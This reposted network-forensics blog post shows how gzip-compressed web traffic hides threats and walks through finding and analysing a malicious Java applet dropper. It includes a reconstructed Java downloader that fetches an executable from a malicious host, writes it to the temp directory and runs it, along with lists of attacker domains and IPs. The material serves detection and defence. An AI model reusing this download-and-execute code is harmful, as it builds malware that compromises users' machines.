REPOST - ORIGINALLY POSTED NOVEMBER 14, 2010
Something I’ve found unsettling for some time now is the drastically increased usage of gzip as a Content-Encoding transfer type from web servers. By default now, Yahoo, Google, Facebook, Twitter, Wikipedia, and many other organizations compress the content they send to your users. From that list alone, you can infer that most of the HTTP traffic on any given network is not transferred in plaintext, but rather as compressed bytes.
That means web content you’d expect to look like this on the wire (making it easily searchable for policy violations and security threats):
In reality, it looks like this:
As it turns out, the two screenshots above are of the exact same network session, the latter being from Wireshark and showing that the data sent by the webserver really is compressed and not discernible.
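If you want to see this for yourself without a packet capture, a minimal Java sketch like the following (the URL is just a placeholder) requests a page with gzip enabled and checks the raw response bytes for the gzip magic number (0x1f 0x8b), which is exactly how the compressed payload appears on the wire:

```java
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;

public class GzipOnTheWire {
    public static void main(String[] args) throws Exception {
        // Hypothetical target; any server that honors Accept-Encoding works.
        HttpURLConnection conn =
                (HttpURLConnection) new URL("http://www.example.com/").openConnection();
        conn.setRequestProperty("Accept-Encoding", "gzip");

        // HttpURLConnection does not transparently decompress, so this is the raw stream.
        try (InputStream raw = conn.getInputStream()) {
            int b1 = raw.read(), b2 = raw.read();
            System.out.println("Content-Encoding: " + conn.getContentEncoding());
            // A gzip stream always begins with the magic bytes 0x1f 0x8b.
            System.out.printf("First two bytes: 0x%02x 0x%02x -> %s%n",
                    b1, b2, (b1 == 0x1f && b2 == 0x8b) ? "gzip" : "plaintext");
        }
    }
}
```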
By extension, you can likely say that most real-time network forensics/monitoring tools are realistically “blind” to a majority of the web traffic flowing into your organization.
Combined with the fact that a vast majority of compromises are delivered to clients via HTTP (at this time, typically through the use of JavaScript), my use of the word “unsettling” is an understatement. This includes everything from “APT” types of threats (or whatever soapbox you stand on to describe the same thing) down to drive-bys and mass exploitations.
The good news: Current trends in exploitation have given us very powerful methods for generic detection (e.g., without needing “signatures,” or more precisely, preexisting knowledge about the details of particular vulnerabilities or exploits) by examining traits of JavaScript, iframes, HTML, PDFs, etc.
The bad news: Webservers are reducing the chance that network technologies will detect those conditions, because compression-based transfer acts as obfuscation.
I find no fault with organizations choosing to use gzip as their transfer encoding. HTML is a horribly repetitive and redundant language (read: bloated). Every opening <tag> has an identical closing </tag>. XML is even worse. For massive sites with massive traffic, the redundancy and bloat of formats like HTML and XML translate directly to lost revenue via extremely large amounts of wasted bandwidth.
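To make that bandwidth argument concrete, here is a minimal Java sketch that gzips a deliberately repetitive HTML fragment and prints the savings; the fragment itself is made up, but the ratio is representative of real markup:

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.zip.GZIPOutputStream;

public class MarkupBloat {
    public static void main(String[] args) throws Exception {
        // Build a deliberately repetitive HTML fragment, as real pages are.
        StringBuilder html = new StringBuilder();
        for (int i = 0; i < 500; i++) {
            html.append("<div class=\"item\"><span>entry ").append(i).append("</span></div>\n");
        }
        byte[] plain = html.toString().getBytes(StandardCharsets.UTF_8);

        // Compress the whole fragment with gzip, in memory.
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (GZIPOutputStream gz = new GZIPOutputStream(buf)) {
            gz.write(plain);
        }

        System.out.printf("plain: %d bytes, gzip: %d bytes (%.0f%% saved)%n",
                plain.length, buf.size(),
                100.0 * (plain.length - buf.size()) / plain.length);
    }
}
```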
Nonetheless, as forensic engineers, our challenge is to discover and compensate for all the things proactive security technologies like AV, firewalls, IPS, etc. continually fail to identify and stop. Recently, I added the following rule on a customer’s network in NetWitness:
If you’re not familiar with the NetWitness rule syntax, the rule above does the following:
If the server application/version (as extracted by the protocol parsing engine) contains the string: “nginx,”
AND
If the Content-Encoding used by the server is gzip
THEN
Create a tag labeled “http_gzip_from_nginx” in a key called “monitors.”
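Since the rule itself only appears in the screenshot, here is the same two-condition logic expressed as a small, hypothetical Java helper. This is not NetWitness rule syntax, and the “nginx/0.7.67” server string below is just an illustrative value:

```java
import java.util.Optional;

public class GzipNginxRule {
    /**
     * Mirrors the rule described above: tag any session whose server
     * header contains "nginx" AND whose Content-Encoding is gzip.
     * Returns the tag to register under the "monitors" key, if any.
     */
    static Optional<String> evaluate(String serverHeader, String contentEncoding) {
        boolean nginx = serverHeader != null && serverHeader.toLowerCase().contains("nginx");
        boolean gzip = "gzip".equalsIgnoreCase(contentEncoding);
        return (nginx && gzip) ? Optional.of("http_gzip_from_nginx") : Optional.empty();
    }

    public static void main(String[] args) {
        System.out.println(evaluate("nginx/0.7.67", "gzip"));   // Optional[http_gzip_from_nginx]
        System.out.println(evaluate("Apache/2.2.14", "gzip"));  // Optional.empty
    }
}
```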
In the Investigator GUI, you would see something like this in the “monitors” key:
Why nginx? As it turns out, a lot of hackers tend to use nginx webservers, so this seemed like a good place to start experimenting. The question I was trying to answer is:
If the content body of a web response is gzip’ed (so we can’t examine traits of “suspiciousness” inside the body), then what can we see outside the body to indicate this gzip’ed traffic is worth examining further?
We’ll revisit this question in later blog posts, but for now, nginx as a webserver is an amazingly powerful place to start! We’ll examine one such example in this post, with an additional post to follow using the gzip + nginx combination. As the small screenshot above shows, there were 33 sessions meeting the criteria of gzip + nginx (out of about 50,000 sessions). With only 33 sessions, it would be possible to drill into the packets of all 33 and examine them one-by-one (i.e., brute-force forensic examination), but that would be poor forensic technique and would defeat the entire point of a technical and educational network forensics blog! The examples in this series of blog posts will instead employ good forensic practice using “correlative techniques,” giving us a good idea of what is inside the packet contents before we ever drill that deeply into the network data.
The first pivot point we’ll examine is countries. Keep in mind, this is after we used the rule above to include only network sessions where the server returned gzip-compressed content and where the webserver was some flavor of nginx. We could have done the same manually by first pivoting on the Content-Encoding of gzip:
Doing the first pivot reduces the number of sessions we’re examining from about 50,000 down to 2,878. Then we can apply a custom filter to include only servers containing the string “nginx” within those 2,878 sessions. Doing so gives us the same 33 sessions mentioned above.
In those 33 sessions, the countries communicated with are:
Not only do we tend to see a higher degree of malicious traffic from countries like Latvia, but it also immediately looks suspicious simply because it’s an outlier in the list. (Don’t worry, Latvia; we’ll pick on our own country in the next post!) Additionally, there’s only a single session to examine here, meaning drilling into the packet-level detail is a reasonable decision at this point.
In the request, we see the client requested the file “/th/inyrktgsxtfwylf.php” from the host “ertyi.net,” as shown next:
As expected, based on the meta information NetWitness already extracted, we see the gzip’ed reply from an nginx server:
Fortunately, Investigator makes it easy for us to examine gzip’ed content by right-clicking in the session display and selecting decode as compressed data:
Doing so shows us a MUCH different story!
The traffic appears to be obfuscated JavaScript. We can extract it from NetWitness (in a few different ways) to clean it up and examine it. I’ll skip those steps and just show the cleaned-up, nicely formatted content the webserver returned.
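If you’d rather reproduce Investigator’s “decode as compressed data” step offline, a minimal Java sketch like this does the same thing (it assumes you’ve already exported the raw gzip’ed HTTP body to a file; “response-body.gz” is a hypothetical name):

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.zip.GZIPInputStream;

public class DecodeBody {
    public static void main(String[] args) throws Exception {
        // Raw gzip'ed body, previously exported from the capture.
        byte[] compressed = Files.readAllBytes(Paths.get("response-body.gz"));

        // Inflate the gzip stream back into the original response content.
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (InputStream in = new GZIPInputStream(new ByteArrayInputStream(compressed))) {
            byte[] chunk = new byte[4096];
            for (int n; (n = in.read(chunk)) != -1; ) {
                out.write(chunk, 0, n);
            }
        }
        System.out.println(out.toString("UTF-8"));
    }
}
```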
There are a few things to notice here. At the very bottom of the image above, we clearly see encoded JavaScript, a trait extremely common to client-side exploit delivery and malicious webpages. We’ll save full JavaScript reverse engineering for another blog post.
But the worst (or most interesting) part is that the decoding and evaluation logic for this encoded data, while implemented in JavaScript, is stored inside a TextArea HTML object! This technique makes the real logic invisible and indiscernible to most automated JavaScript reverse engineering tools.
Indeed, if we upload this webpage to one of my favorite JavaScript reversing sites (jsunpack, located at http://jsunpack.jeek.org/dec/go), we see the following results when the site attempts to automatically reverse engineer the JavaScript:
Without going further into the process of reverse engineering the JavaScript (for now; we have an endless supply of blog posts coming!), we can be quite sure we’re looking at something suspicious. At the very least, we know for a fact we’re looking at something that does not make it easy to discern what it’s doing!
The telltale signs of “badness” don’t stop there. At the top of the decoded body data, we saw an embedded Java applet, as follows:
While we don’t know (yet) what the applet does, there’s a pretty strong indication it’s a downloader or C&C (command and control) application of some type. How can we make such a guess without knowing anything about it?
Look closely at the embedded parameter passed into the applet:
We can make a guess that the string contained in the “value” parameter is data encoded with a simple substitution cipher, where an “S” in the parameter stands for an actual “t” and a “T” in the parameter stands for an actual “/”. If that guess is right, then the decoded parameter value actually starts with the string “http://”.
Of course, because we have the download of the JAR file within our full-packet capture and storage database, we’ll just extract it from NetWitness to validate our hunch and possibly learn more. In the screenshot below, I had already performed the following steps:
The first line of code in the Java applet takes the parameter passed to it (the encoded value we identified above) and hands it to a function called “b.” The result of that function is stored in a string variable called str1.
Following the decompiled Java code to function “b,” we see the following:
It turns out the applet really is using a simple substitution cipher, replacing one given character with another. When the parameter “RSS=,TT!;LBIB@STSRTYG$I=R=” is decoded, we end up with the string “http://uijn.net/th/fs7.php?i=1”.
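For illustration, here is a minimal Java sketch of that substitution decode. The mapping table below is partial, inferred by lining up the encoded parameter with the decoded URL from this session (the applet’s function “b” holds the real, complete table); note that the encoded string as transcribed above appears to be missing the last few characters that would decode to “?i=1”:

```java
import java.util.HashMap;
import java.util.Map;

public class AppletParamDecoder {
    // Partial mapping inferred from this one session's encoded/decoded pair.
    private static final Map<Character, Character> SUBST = new HashMap<>();
    static {
        SUBST.put('R', 'h'); SUBST.put('S', 't'); SUBST.put('=', 'p');
        SUBST.put(',', ':'); SUBST.put('T', '/'); SUBST.put('!', 'u');
        SUBST.put(';', 'i'); SUBST.put('L', 'j'); SUBST.put('B', 'n');
        SUBST.put('I', '.'); SUBST.put('@', 'e'); SUBST.put('Y', 'f');
        SUBST.put('G', 's'); SUBST.put('$', '7');
    }

    static String decode(String s) {
        StringBuilder out = new StringBuilder();
        for (char c : s.toCharArray()) {
            out.append(SUBST.getOrDefault(c, '?')); // '?' marks unmapped characters
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Prints "http://uijn.net/th/fs7.php" (the "?i=1" tail corresponds to
        // characters not present in the string as captured above).
        System.out.println(decode("RSS=,TT!;LBIB@STSRTYG$I=R="));
    }
}
```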
The Java malware then continues with additional string functions, as shown next:
First, we see the declaration of str2 through str5, with values assigned to each.
Then, str6 through str8 are simply the reversals of str2 through str4, resulting in the following strings:
str6 = “.exe”
str7 = “java.io.tmpdir”
str8 = “os.name”
Combining that with the last three lines of code shown above, we see the following:
str10 is a filename ending in “.exe”, where the actual filename is a randomly generated number.
str11 is the path to temporary files for the current user.
str12 is the name of the operating system the Java malware is currently running on.
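Pulling those pieces together, the decompiled logic is roughly equivalent to the following Java sketch. The reversed literals are reconstructed from the strings above, and Math.random() stands in for whatever random-number call the applet actually uses:

```java
public class StringSetup {
    public static void main(String[] args) {
        // The applet stores its strings reversed, presumably to dodge
        // naive string scanners; these literals are reconstructions.
        String str2 = "exe.";
        String str3 = "ridpmt.oi.avaj";
        String str4 = "eman.so";

        String str6 = new StringBuilder(str2).reverse().toString(); // ".exe"
        String str7 = new StringBuilder(str3).reverse().toString(); // "java.io.tmpdir"
        String str8 = new StringBuilder(str4).reverse().toString(); // "os.name"

        // The last three lines of the decompiled code resolve to:
        String str10 = (int) (Math.random() * 1e8) + str6;  // random number + ".exe"
        String str11 = System.getProperty(str7);            // user temp directory
        String str12 = System.getProperty(str8);            // operating system name

        System.out.println(str10 + " | " + str11 + " | " + str12);
    }
}
```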
The last part of this Java malware (that we’ll examine here, anyway) is shown next:
First, it tests whether the string “Windows” is contained anywhere in the name of the operating system. If so, it opens a connection to the URL (the one we decoded above), downloads the file, saves it to the temporary directory, and then executes it.
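In Java terms, the control flow just described boils down to something like the following reconstruction (a sketch of the described behavior, not the literal decompiled source):

```java
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;

public class DownloaderLogic {
    public static void main(String[] args) throws Exception {
        String url = "http://uijn.net/th/fs7.php?i=1"; // the URL decoded above
        String name = (int) (Math.random() * 1e8) + ".exe";
        File dropped = new File(System.getProperty("java.io.tmpdir"), name);

        // Only proceeds on Windows hosts, since the payload is a PE executable.
        if (System.getProperty("os.name").contains("Windows")) {
            // Download the payload and write it to the user's temp directory.
            try (InputStream in = new URL(url).openStream();
                 FileOutputStream out = new FileOutputStream(dropped)) {
                byte[] buf = new byte[4096];
                for (int n; (n = in.read(buf)) != -1; ) {
                    out.write(buf, 0, n);
                }
            }
            Runtime.getRuntime().exec(dropped.getAbsolutePath()); // launch the dropped file
        }
    }
}
```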
This appears to be a first-stage downloader: malware whose job is to fetch other executables that are likely far more malicious.
Even though a large amount of web traffic comes into your organization gzip-compressed, making most inline/real-time security products totally “blind” to what’s inside, we can use standard forensic principles to identify which of those sessions are worth examining. In this case, we combined the following traits to reduce 50,000 network sessions to a single one: a gzip Content-Encoding, an nginx server, and an outlier destination country.
Once we drilled into that single session, we saw how trivial it was to use NetWitness to automatically decompress the content, extract it, and then validate it as “bad.”
Does the process stop there? Of course not! If you had to repeat this process every time, not only would it make your job boring as heck, but it would also call into question the value you and your tools are really providing the organization in the first place! There are many ways to maximize the intelligence gained from the process just shown. I’ll highlight one method here, while saving others for later blog posts.
There are several interesting “indicators” gathered from this traffic so far. The ones I’ll focus on here are host names. In the request made by the client, we saw the following tag in the HTTP Request header:
Host: ertyi.net
In the Java malware we decompiled, after decoding the encoded parameter value, we saw that the executable would be downloaded from the host “uijn.net.”
At this point, network rules should be added to firewalls, proxies, NetWitness intelligence feeds, and any other technology you have that can alert on hosts communicating with either of those servers, preferably blocking all traffic to those servers outright.
But, can we extend our security perimeter in relation to the hackers using those servers?
Interestingly, we find both of those domains hosted on adjacent addresses in the same IP block: 194.8.250.60 and 194.8.250.61.
That leads to the question, “What other domains are hosted on those servers?”
Normally I use http://www.robtex.com to answer questions like that, but in this case, robtex does not provide much information. It’s possible the hackers are bringing up and tearing down DNS records as needed for the domain names they manage.
Another source of helpful information is the “Passive DNS replication” database hosted at http://www.bfk.de/bfk_dnslogger.html. There, we can find an audit trail of all historically observed DNS replies pointing to the IPs we query. In this case, we do indeed find valuable information, including about 40 unique host names that have been hosted on those two IPs. A shortened list is included below, showing some of the names that have been hosted there.
aeriklin.com
aijkl.net
asdfiz.net
asuyr.net
campag.net
iifgn.net
jhgi.net
jugv.net
kobqq.com
krclear.com
lilif.net
nadwq.com
oiuhx.net
pokiz.net
uijn.net
As we can see, none of them look immediately legitimate, so we can infer this is a hacking group using a set of servers for domains they have registered simply to be “thrown away” if any of those domain names are discovered and end up on a blacklist somewhere.
By combining a few pivot points and looking inside compressed web traffic that most products ignore, we proactively increased the security posture of the organization from a single network session by creating an intelligence feed of nearly 40 host names and two IPs. You could now audit DNS queries made by all hosts in your organization to see if other clients are compromised and performing look-ups when trying to communicate with those hosts.
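As a quick one-off check, a Java sketch like the following resolves a few of the suspect host names and flags any that currently land in the 194.8.250.0/23 block. In practice, you’d feed the full list into your DNS logging and blocklist infrastructure instead:

```java
import java.net.InetAddress;

public class DnsAudit {
    public static void main(String[] args) {
        // A few of the host names from the passive-DNS list above.
        String[] suspects = { "aeriklin.com", "uijn.net", "ertyi.net", "pokiz.net" };

        for (String host : suspects) {
            try {
                for (InetAddress addr : InetAddress.getAllByName(host)) {
                    byte[] ip = addr.getAddress();
                    // 194.8.250.0/23 covers 194.8.250.x and 194.8.251.x.
                    boolean inBlock = (ip[0] & 0xff) == 194 && (ip[1] & 0xff) == 8
                            && ((ip[2] & 0xff) == 250 || (ip[2] & 0xff) == 251);
                    System.out.println(host + " -> " + addr.getHostAddress()
                            + (inBlock ? "  [MALICIOUS BLOCK]" : ""));
                }
            } catch (Exception e) {
                System.out.println(host + " -> does not resolve");
            }
        }
    }
}
```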
For the truly paranoid (or safe, depending on how you look at it), you could also blackhole all traffic to those apparently malicious networks:
route: 194.8.250.0/23
origin: AS29557
Considering the Google Safe Browsing report for that AS, it’s probably not a bad idea!
Gary Golomb